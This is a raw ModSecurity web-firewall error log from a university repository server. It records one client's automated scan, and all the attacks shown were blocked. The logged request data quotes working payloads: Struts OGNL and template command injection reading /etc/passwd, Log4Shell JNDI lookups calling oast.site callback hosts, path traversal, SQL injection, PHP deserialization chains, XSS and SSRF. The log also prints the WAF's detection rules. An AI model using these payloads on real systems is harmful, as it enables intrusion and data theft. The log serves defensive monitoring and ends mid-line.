[Tue Aug 29 11:34:58.340302 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11csCo-f0AAAUTiYYAAABJ"]
[Tue Aug 29 11:34:59.322310 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAAUXLjwAAABM"]
[Tue Aug 29 11:35:01.356611 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAULx80AAABD"]
[Tue Aug 29 11:35:02.345997 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAAUJIzMAAABB"]
[Tue Aug 29 11:35:02.349574 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAVRxcgAAAAQ"]
[Tue Aug 29 11:35:03.309274 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAVRxckAAAAQ"]
[Tue Aug 29 11:35:03.327885 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAATOA@wAAAAH"]
[Tue Aug 29 11:35:04.333073 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAULx9AAAABD"]
[Tue Aug 29 11:35:04.337928 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11eMCo-f0AAAUB02kAAAA5"]
[Tue Aug 29 11:35:05.321844 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgcney39u8ur3jr.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11ecCo-f0AAAUDQUAAAAA7"]
[Tue Aug 29 11:35:05.332681 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlg4wy5j35w6fhpc.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAATavvcAAAAg"]
[Tue Aug 29 11:35:06.369086 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgh51nto7gmqc5j.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgh51nto7gmqc5j.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAATavvoAAAAg"]
[Tue Aug 29 11:35:07.323930 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAATXLM4AAAAb"]
[Tue Aug 29 11:35:07.344098 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAATUxSUAAAAW"]
[Tue Aug 29 11:35:08.324897 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAATQXisAAAAO"]
[Tue Aug 29 11:35:09.347480 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAAUQ7tQAAABH"]
[Tue Aug 29 11:35:10.344417 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAUUZ9QAAABK"]
[Tue Aug 29 11:35:10.360474 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAUZcGwAAABO"]
[Tue Aug 29 11:35:10.374692 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAUOaVcAAABG"]
[Tue Aug 29 11:35:12.362007 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAUJIzwAAABB"]
[Tue Aug 29 11:35:12.480276 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVJXlkAAAAA"]
[Tue Aug 29 11:35:12.750563 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVJXlkAAAAA"]
[Tue Aug 29 11:35:13.339822 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gcCo-f0AAAVRxdwAAAAQ"]
[Tue Aug 29 11:35:13.414946 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAATQXjQAAAAO"]
[Tue Aug 29 11:35:14.332110 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAUdm5kAAABS"]
[Tue Aug 29 11:35:14.352852 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAUQ7t0AAABH"]
[Tue Aug 29 11:35:16.258873 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "repository.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAATzVKMAAAAx"]
[Tue Aug 29 11:35:16.350439 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAVr@RgAAAAZ"]
[Tue Aug 29 11:35:16.371583 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAVvlGcAAAAe"]
[Tue Aug 29 11:35:16.405729 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAVRxeEAAAAQ"]
[Tue Aug 29 11:35:18.508034 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAARdiUoAAAAK"]
[Tue Aug 29 11:35:18.532756 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 